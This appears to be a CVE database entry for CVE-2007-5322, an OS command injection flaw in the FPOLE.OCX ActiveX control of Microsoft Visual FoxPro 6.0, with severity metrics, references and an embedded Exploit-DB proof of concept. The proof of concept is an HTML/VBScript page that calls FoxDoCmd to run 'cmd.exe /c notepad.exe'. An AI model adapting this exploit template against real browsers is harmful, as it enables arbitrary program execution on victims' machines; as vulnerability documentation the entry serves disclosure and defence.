CVE-2007-5322 : Detail

CVE-2007-5322

OS Command Injection
A03-Injection
35.43%V4
Network
2007-10-09
20h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Insecure method vulnerability in the FPOLE.OCX 6.0.8450.0 ActiveX control in Microsoft Visual FoxPro 6.0 allows remote attackers to execute arbitrary programs by specifying them as an argument to the FoxDoCmd function.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 4506

Publication date : 2007-10-08 22h00 +00:00
Author : shinnai
EDB Verified : Yes

<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">----------------------------------------------------------------------------- <b>Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution</b> url: http://www.microsoft.com Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org <b><font color='red'>This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.</font></b> <b>Technical Details File: FPOLE.OCX Version: 6.0.8450.0 MD5: E9A1D8CFE6C791BA76B7343FA39752FB Marked as: RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller</b> Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 When I released this <a href='http://www.milw0rm.com/exploits/4369'>http://www.milw0rm.com/exploits/4369</a> I never thought it was possible to use the "FoxDoCmd()" method to run applications passed as argument but... ----------------------------------------------------------------------------- <object classid='clsid:EF28418F-FFB2-11D0-861A-00A0C903A97F' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.FoxDoCmd "RUN cmd.exe /c notepad.exe", "Something" End Sub </script> </span></span> </code></pre> # milw0rm.com [2007-10-09]

Products Mentioned

Configuraton 0

Microsoft>>Visual_foxpro >> Version 6.0

References

https://www.exploit-db.com/exploits/4506
Tags : exploit, x_refsource_EXPLOIT-DB
http://osvdb.org/38487
Tags : vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/27165
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/25977
Tags : vdb-entry, x_refsource_BID